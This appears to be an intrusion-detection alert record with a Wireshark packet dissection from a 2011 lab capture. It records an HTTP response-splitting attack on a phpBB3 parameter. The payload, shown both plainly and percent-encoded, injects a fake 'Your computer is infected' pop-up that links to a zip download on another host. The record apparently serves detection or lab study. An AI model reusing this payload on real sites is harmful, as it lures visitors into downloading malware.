Culprit: webiotprimeq/inputprimehttp1314321279

Code: d1

SID: val
Content-Type: text/html
Content-Length: 296

<html>htmlhtmlhtmlhtmlhtmlhtmlhtml</html>
<html><script>my_window = window.open("", "mywindow1", "status=1,width=450,height=250");my_window.document.write("<h1>!!!Your computer is infected!!!</h1>");my_window.document.write("<h2>Click to <a href=http://192.168.147.130/dwnld.zip> download</a> your anti-virus now</h2>");</script></html>

PID: val
Content-Type: text/html
Content-Length: 296

<html>htmlhtmlhtmlhtmlhtmlhtmlhtml</html>
<html><script>my_window = window.open("", "mywindow1", "status=1,width=450,height=250");my_window.document.write("<h1>!!!Your computer is infected!!!</h1>");my_window.document.write("<h2>Click to <a href=http://192.168.147.130/dwnld.zip> download</a> your anti-virus now</h2>");</script></html>

Match: val
Content-Type: text/html
Content-Length: 296

<html>htmlhtmlhtmlhtmlhtmlhtmlhtml</html>
<html><script>my_window = window.open("", "mywindow1", "status=1,width=450,height=250");my_window.document.write("<h1>!!!Your computer is infected!!!</h1>");my_window.document.write("<h2>Click to <a href=http://192.168.147.130/dwnld.zip> download</a> your anti-virus now</h2>");</script></html>

Packet: <packet>
  <proto name="geninfo" pos="0" showname="General information" size="1243">
    <field name="num" pos="0" show="6520" showname="Number" value="1978" size="1243"/>
    <field name="len" pos="0" show="1243" showname="Packet Length" value="4db" size="1243"/>
    <field name="caplen" pos="0" show="1243" showname="Captured Length" value="4db" size="1243"/>
    <field name="timestamp" pos="0" show="Aug 26, 2011 03:20:19.349038000" showname="Captured Time" value="1314321619.349038000" size="1243"/>
  </proto>
<proto name="http" showname="Hypertext Transfer Protocol" size="1175" pos="68">
    <field name="" show="[truncated] GET /phpbb3/index.php?v=val%0dContent-Type%3A%20text%2Fhtml%0dContent-Length%3A%20296%0d%0d%3Chtml%3Ehtmlhtmlhtmlhtmlhtmlhtmlhtml%3C%2Fhtml%3E%0d%3C%68%74%6D%6C%3E%3C%73%63%72%69%70%74%3E%6D%79%5F%77%69%6E%64%6F%77%20%3D%20%77%" size="1038" pos="68" value="474554202f7068706262332f696e6465782e7068703f763d76616c253064436f6e74656e742d547970652533412532307465787425324668746d6c253064436f6e74656e742d4c656e67746825334125323032393625306425306425334368746d6c25334568746d6c68746d6c68746d6c68746d6c68746d6c68746d6c68746d6c25334325324668746d6c25334525306425334325363825373425364425364325334525334325373325363325373225363925373025373425334525364425373925354625373725363925364525363425364625373725323025334425323025373725363925364525363425364625373725324525364625373025363525364525323825323225323225324325323025323225364425373925373725363925364525363425364625373725333125323225324325323025323225373325373425363125373425373525373325334425333125324325373725363925363425373425363825334425333425333525333025324325363825363525363925363725363825373425334425333225333525333025323225323925334225364425373925354625373725363925364525363425364625373725324525363425364625363325373525364425363525364525373425324525373725373225363925373425363525323825323225334325363825333125334525323125323125323125353925364625373525373225323025363325364625364425373025373525373425363525373225323025363925373325323025363925364525363625363525363325373425363525363425323125323125323125334325324625363825333125334525323225323925334225364425373925354625373725363925364525363425364625373725324525363425364625363325373525364425363525364525373425324525373725373225363925373425363525323825323225334325363825333225334525343325364325363925363325364225323025373425364625323025334325363125323025363825373225363525363625334425363825373425373425373025334125324625324625333125333925333225324525333125333625333825324525333125333425333725324525333125333325333025324625363425373725364525364325363425324525374125363925373025334525323025363425364625373725364525364325364625363125363425334325324625363125334525323025373925364625373525373225323025363125364525373425363925324425373625363925373225373525373325323025364525364625373725334325324625363825333225334525323225323925334225334325324625373325363325373225363925373025373425334525334325324625363825373425364425364325334520485454502f312e310d0a">
      <field name="http.request.method" showname="Request Method: GET" size="3" pos="68" show="GET" value="474554"/>
      <field name="http.request.uri" showname="Request URI [truncated]: /phpbb3/index.php?v=val%0dContent-Type%3A%20text%2Fhtml%0dContent-Length%3A%20296%0d%0d%3Chtml%3Ehtmlhtmlhtmlhtmlhtmlhtmlhtml%3C%2Fhtml%3E%0d%3C%68%74%6D%6C%3E%3C%73%63%72%69%70%74%3E%6D%79%5F%77%69%6E%64%6F%77%20%" size="1023" pos="72" show="/phpbb3/index.php?v=val%0dContent-Type%3A%20text%2Fhtml%0dContent-Length%3A%20296%0d%0d%3Chtml%3Ehtmlhtmlhtmlhtmlhtmlhtmlhtml%3C%2Fhtml%3E%0d%3C%68%74%6D%6C%3E%3C%73%63%72%69%70%74%3E%6D%79%5F%77%69%6E%64%6F%77%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%22%22%2C%20%22%6D%79%77%69%6E%64%6F%77%31%22%2C%20%22%73%74%61%74%75%73%3D%31%2C%77%69%64%74%68%3D%34%35%30%2C%68%65%69%67%68%74%3D%32%35%30%22%29%3B%6D%79%5F%77%69%6E%64%6F%77%2E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%68%31%3E%21%21%21%59%6F%75%72%20%63%6F%6D%70%75%74%65%72%20%69%73%20%69%6E%66%65%63%74%65%64%21%21%21%3C%2F%68%31%3E%22%29%3B%6D%79%5F%77%69%6E%64%6F%77%2E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%68%32%3E%43%6C%69%63%6B%20%74%6F%20%3C%61%20%68%72%65%66%3D%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%34%37%2E%31%33%30%2F%64%77%6E%6C%64%2E%7A%69%70%3E%20%64%6F%77%6E%6C%6F%61%64%3C%2F%61%3E%20%79%6F%75%72%20%61%6E%74%69%2D%76%69%72%75%73%20%6E%6F%77%3C%2F%68%32%3E%22%29%3B%3C%2F%73%63%72%69%70%74%3E%3C%2F%68%74%6D%6C%3E" value="2f7068706262332f696e6465782e7068703f763d76616c253064436f6e74656e742d547970652533412532307465787425324668746d6c253064436f6e74656e742d4c656e67746825334125323032393625306425306425334368746d6c25334568746d6c68746d6c68746d6c68746d6c68746d6c68746d6c68746d6c25334325324668746d6c253345253064253343253638253734253644253643253345253343253733253633253732253639253730253734253345253644253739253546253737253639253645253634253646253737253230253344253230253737253639253645253634253646253737253245253646253730253635253645253238253232253232253243253230253232253644253739253737253639253645253634253646253737253331253232253243253230253232253733253734253631253734253735253733253344253331253243253737253639253634253734253638253344253334253335253330253243253638253635253639253637253638253734253344253332253335253330253232253239253342253644253739253546253737253639253645253634253646253737253245253634253646253633253735253644253635253645253734253245253737253732253639253734253635253238253232253343253638253331253345253231253231253231253539253646253735253732253230253633253646253644253730253735253734253635253732253230253639253733253230253639253645253636253635253633253734253635253634253231253231253231253343253246253638253331253345253232253239253342253644253739253546253737253639253645253634253646253737253245253634253646253633253735253644253635253645253734253245253737253732253639253734253635253238253232253343253638253332253345253433253643253639253633253642253230253734253646253230253343253631253230253638253732253635253636253344253638253734253734253730253341253246253246253331253339253332253245253331253336253338253245253331253334253337253245253331253333253330253246253634253737253645253643253634253245253741253639253730253345253230253634253646253737253645253643253646253631253634253343253246253631253345253230253739253646253735253732253230253631253645253734253639253244253736253639253732253735253733253230253645253646253737253343253246253638253332253345253232253239253342253343253246253733253633253732253639253730253734253345253343253246253638253734253644253643253345"/>
      <field name="http.request.version" showname="Request Version: HTTP/1.1" size="8" pos="1096" show="HTTP/1.1" value="485454502f312e31"/>
    </field>
    <field name="http.user_agent" showname="User-Agent: curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1\r\n" size="99" pos="1106" show="curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1" value="557365722d4167656e743a206375726c2f372e31382e302028693438362d70632d6c696e75782d676e7529206c69626375726c2f372e31382e30204f70656e53534c2f302e392e3867207a6c69622f312e322e332e33206c696269646e2f312e310d0a"/>
    <field name="http.host" showname="Host: 192.168.147.128\r\n" size="23" pos="1205" show="192.168.147.128" value="486f73743a203139322e3136382e3134372e3132380d0a"/>
    <field name="http.accept" showname="Accept: */*\r\n" size="13" pos="1228" show="*/*" value="4163636570743a202a2f2a0d0a"/>
    <field name="" show="\r\n" size="2" pos="1241" value="0d0a"/>
    <field name="http.request" showname="Request: True" hide="yes" size="0" pos="68" show="1"/>
  </proto>
</packet>

